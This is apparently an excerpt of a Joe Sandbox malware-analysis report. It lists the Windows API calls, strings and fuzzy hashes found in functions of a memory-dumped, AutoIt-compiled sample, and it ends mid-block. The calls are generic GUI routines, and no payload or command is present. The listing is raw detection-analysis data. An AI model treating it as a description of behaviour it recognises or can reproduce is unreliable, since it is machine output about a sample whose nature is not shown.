                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00F9A999
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F9A9B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00F9A9C5
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F9A9ED
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F9AA14
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00F9AA32
                                                              • DrawFocusRect.USER32(?,?), ref: 00F9AA3D
                                                              • GetSysColor.USER32(00000011), ref: 00F9AA4B
                                                              • SetTextColor.GDI32(?,00000000), ref: 00F9AA53
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F9AA67
                                                              • SelectObject.GDI32(?,00F9A5FA), ref: 00F9AA7E
                                                              • DeleteObject.GDI32(?), ref: 00F9AA89
                                                              • SelectObject.GDI32(?,?), ref: 00F9AA8F
                                                              • DeleteObject.GDI32(?), ref: 00F9AA94
                                                              • SetTextColor.GDI32(?,?), ref: 00F9AA9A
                                                              • SetBkColor.GDI32(?,?), ref: 00F9AAA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: d35f0acf2b33e18d3a5c6e42eb7083a13cccfa5e2b156823d16a7dba9eb7c7ff
                                                              • Instruction ID: ba58621472b17356421a95c5da8a0468063026220739076947fbeaa838227960
                                                              • Opcode Fuzzy Hash: d35f0acf2b33e18d3a5c6e42eb7083a13cccfa5e2b156823d16a7dba9eb7c7ff
                                                              • Instruction Fuzzy Hash: BD513B71900218EFDF119FA4DC48AAE7BB9FB48320F254226F911EB2A1D7759944EF90
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F98AC1
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F98AD2
                                                              • CharNextW.USER32(0000014E), ref: 00F98B01
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F98B42
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F98B58
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F98B69
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F98B86
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00F98BD8
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F98BEE
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F98C1F
                                                              • _memset.LIBCMT ref: 00F98C44
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F98C8D
                                                              • _memset.LIBCMT ref: 00F98CEC
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F98D16
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F98D6E
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00F98E1B
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00F98E3D
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F98E87
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F98EB4
                                                              • DrawMenuBar.USER32(?), ref: 00F98EC3
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00F98EEB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: b7056d7675bca77effcd7266f213e38910501b45959ee3675fc953b30e8cdf50
                                                              • Instruction ID: 603b921fbcefe0ca5abfda395cde8ce72f76027580fe88e29096dc264932a6b2
                                                              • Opcode Fuzzy Hash: b7056d7675bca77effcd7266f213e38910501b45959ee3675fc953b30e8cdf50
                                                              • Instruction Fuzzy Hash: E8E18371900219AFEF20DF60CC84EEE7B79EF06760F148156F915AB291DB748985EF60
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00F949CA
                                                              • GetDesktopWindow.USER32 ref: 00F949DF
                                                              • GetWindowRect.USER32(00000000), ref: 00F949E6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F94A48
                                                              • DestroyWindow.USER32(?), ref: 00F94A74
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F94A9D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F94ABB
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F94AE1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00F94AF6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F94B09
                                                              • IsWindowVisible.USER32(?), ref: 00F94B29
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F94B44
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F94B58
                                                              • GetWindowRect.USER32(?,?), ref: 00F94B70
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00F94B96
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00F94BB0
                                                              • CopyRect.USER32(?,?), ref: 00F94BC7
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00F94C32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: 697db021226230624b2d1b2e9f84865d94c2e644ff92a4460b24039a578da967
                                                              • Instruction ID: b9b349772cc1ad03463a6d8e145103e38b5a960319bc47127d46eacbaed8ef38
                                                              • Opcode Fuzzy Hash: 697db021226230624b2d1b2e9f84865d94c2e644ff92a4460b24039a578da967
                                                              • Instruction Fuzzy Hash: EBB1BB71A08300AFEB04DF64C844F6ABBE4BF98310F008A1DF5999B2A1D775EC06DB95
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F744AC
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F744D2
                                                              • _wcscpy.LIBCMT ref: 00F74500
                                                              • _wcscmp.LIBCMT ref: 00F7450B
                                                              • _wcscat.LIBCMT ref: 00F74521
                                                              • _wcsstr.LIBCMT ref: 00F7452C
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F74548
                                                              • _wcscat.LIBCMT ref: 00F74591
                                                              • _wcscat.LIBCMT ref: 00F74598
                                                              • _wcsncpy.LIBCMT ref: 00F745C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 4a511fe4fd53a68d64c1b44fe70b6e2379af459d203ac0b029005d606556551d
                                                              • Instruction ID: 6ff01e137615937182466366218ed39f0e411fb9527123f4c236f2d95369b5c9
                                                              • Opcode Fuzzy Hash: 4a511fe4fd53a68d64c1b44fe70b6e2379af459d203ac0b029005d606556551d
                                                              • Instruction Fuzzy Hash: 2141D832A002157BDB10AB749C47EBF776CDF41720F14406AF905E6182EB39EA01B6AA
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F128BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 00F128C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F128EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 00F128F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 00F1291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F12939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F12949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F1297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F12990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00F129AE
                                                              • GetStockObject.GDI32(00000011), ref: 00F129CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F129D5
                                                                • Part of subcall function 00F12344: GetCursorPos.USER32(?), ref: 00F12357
                                                                • Part of subcall function 00F12344: ScreenToClient.USER32(00FD57B0,?), ref: 00F12374
                                                                • Part of subcall function 00F12344: GetAsyncKeyState.USER32(00000001), ref: 00F12399
                                                                • Part of subcall function 00F12344: GetAsyncKeyState.USER32(00000002), ref: 00F123A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00F11256), ref: 00F129FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 0391a947748b53bab6853302dc90f70045b31f991d043d1e367e6aeffaa4c669
                                                              • Instruction ID: fe1120327b4defb9372cf4c2fd5cfc9275d450f5e640dd918c557287229a4321
                                                              • Opcode Fuzzy Hash: 0391a947748b53bab6853302dc90f70045b31f991d043d1e367e6aeffaa4c669
                                                              • Instruction Fuzzy Hash: 03B18E71A0120AEFDB54DFA8CC45BEE7BB5FB48721F10422AFA15E7290DB749850EB50
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00F6A47A
                                                              • __swprintf.LIBCMT ref: 00F6A51B
                                                              • _wcscmp.LIBCMT ref: 00F6A52E
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F6A583
                                                              • _wcscmp.LIBCMT ref: 00F6A5BF
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00F6A5F6
                                                              • GetDlgCtrlID.USER32(?), ref: 00F6A648
                                                              • GetWindowRect.USER32(?,?), ref: 00F6A67E
                                                              • GetParent.USER32(?), ref: 00F6A69C
                                                              • ScreenToClient.USER32(00000000), ref: 00F6A6A3
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00F6A71D
                                                              • _wcscmp.LIBCMT ref: 00F6A731
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00F6A757
                                                              • _wcscmp.LIBCMT ref: 00F6A76B
                                                                • Part of subcall function 00F3362C: _iswctype.LIBCMT ref: 00F33634
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                              • String ID: %s%u
                                                              • API String ID: 3744389584-679674701
                                                              • Opcode ID: 94db529aaac773382a2be48748cb70a67542b6ff5b483af7658f472ad6b0e912
                                                              • Instruction ID: 43b7f3d5b37012b1d4b1ece3890efc88da1a13d5d5a9ccc8bade64bbc744759d
                                                              • Opcode Fuzzy Hash: 94db529aaac773382a2be48748cb70a67542b6ff5b483af7658f472ad6b0e912
                                                              • Instruction Fuzzy Hash: B7A1F471604306AFD714DF60C884FAAB7E8FF44320F048629F999E2190DB34E955EF92
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00F6AF18
                                                              • _wcscmp.LIBCMT ref: 00F6AF29
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F6AF51
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00F6AF6E
                                                              • _wcscmp.LIBCMT ref: 00F6AF8C
                                                              • _wcsstr.LIBCMT ref: 00F6AF9D
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00F6AFD5
                                                              • _wcscmp.LIBCMT ref: 00F6AFE5
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F6B00C
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00F6B055
                                                              • _wcscmp.LIBCMT ref: 00F6B065
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00F6B08D
                                                              • GetWindowRect.USER32(00000004,?), ref: 00F6B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: dbf28cb50715d0ce1c249de5ff8876054af09e58c1cf9394197237e14922eda0
                                                              • Instruction ID: a7d3bcac66c0532e684fafab3cc6ce279079d25908d4d6e1c372bafd46e33926
                                                              • Opcode Fuzzy Hash: dbf28cb50715d0ce1c249de5ff8876054af09e58c1cf9394197237e14922eda0
                                                              • Instruction Fuzzy Hash: 5581A471508305AFDB05DF10C885FAA7BE8EF84724F04846AFD85DA096DB34DD89EB62
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: 1f268e25d5c80419c574cab496aad344a669b03e81c896c572597c358095a83a
                                                              • Instruction ID: ea61e139913bab578b5d2db7af4186385e365a0c6cf55c2acc684f37849f57db
                                                              • Opcode Fuzzy Hash: 1f268e25d5c80419c574cab496aad344a669b03e81c896c572597c358095a83a
                                                              • Instruction Fuzzy Hash: 4F314F3194830AAADB14FA51DE43FEE77A4AB20760F600429B416710E5EF5AEF44BE53
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00F85013
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00F8501E
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00F85029
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00F85034
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00F8503F
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00F8504A
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00F85055
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00F85060
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00F8506B
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00F85076
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00F85081
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00F8508C
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00F85097
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00F850A2
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00F850AD
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00F850B8
                                                              • GetCursorInfo.USER32(?), ref: 00F850C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 61c38b69040515f72182b412224a2af166165da11901622a9e046f2ffbcdcec8
                                                              • Instruction ID: 6e2f65f1dca0a120e5c96ad6875ed66f630f731fd4892d9d7f9bfeb56bd1773b
                                                              • Opcode Fuzzy Hash: 61c38b69040515f72182b412224a2af166165da11901622a9e046f2ffbcdcec8
                                                              • Instruction Fuzzy Hash: 553115B1D4831E6BDF109FB68C8999FBFE8FF04760F50452AA50CE7280DA78A5049F91
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F9A259
                                                              • DestroyWindow.USER32(?,?), ref: 00F9A2D3
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F9A34D
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F9A36F
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F9A382
                                                              • DestroyWindow.USER32(00000000), ref: 00F9A3A4
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F10000,00000000), ref: 00F9A3DB
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F9A3F4
                                                              • GetDesktopWindow.USER32 ref: 00F9A40D
                                                              • GetWindowRect.USER32(00000000), ref: 00F9A414
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F9A42C
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F9A444
                                                                • Part of subcall function 00F125DB: GetWindowLongW.USER32(?,000000EB), ref: 00F125EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1297703922-3619404913
                                                              • Opcode ID: 2cf2e36656621efeb0e5c57d954e2d56962e123b358a049adf06a9c64a5b5e2a
                                                              • Instruction ID: fd8182a635de0e7bb9fcbe5483ad15d80effabaac284d7a6231da232406aaef5
                                                              • Opcode Fuzzy Hash: 2cf2e36656621efeb0e5c57d954e2d56962e123b358a049adf06a9c64a5b5e2a
                                                              • Instruction Fuzzy Hash: 5971BF71540309AFEB25CF28CC49F6677E6FB88710F04451DF985872A0C775E946EB92
                                                              APIs
                                                                • Part of subcall function 00F12612: GetWindowLongW.USER32(?,000000EB), ref: 00F12623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 00F9C627
                                                                • Part of subcall function 00F9AB37: ClientToScreen.USER32(?,?), ref: 00F9AB60
                                                                • Part of subcall function 00F9AB37: GetWindowRect.USER32(?,?), ref: 00F9ABD6
                                                                • Part of subcall function 00F9AB37: PtInRect.USER32(?,?,00F9C014), ref: 00F9ABE6
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00F9C690
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F9C69B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F9C6BE
                                                              • _wcscat.LIBCMT ref: 00F9C6EE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F9C705
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00F9C71E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00F9C735
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00F9C757
                                                              • DragFinish.SHELL32(?), ref: 00F9C75E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F9C851
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: a27538cd2516d0854362ef6191d8ec83fb8a1b80b43173bf7a89fb88e37c52a0
                                                              • Instruction ID: 9f8a1b40769e7a79945688b11e32a766183a9172462451282c1ab813e699e0f0
                                                              • Opcode Fuzzy Hash: a27538cd2516d0854362ef6191d8ec83fb8a1b80b43173bf7a89fb88e37c52a0
                                                              • Instruction Fuzzy Hash: 7C619B71108305AFCB01EF64DC85DAFBBF8EF89710F40092EF595921A1DB709A49EB92
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00F94424
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F9446F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
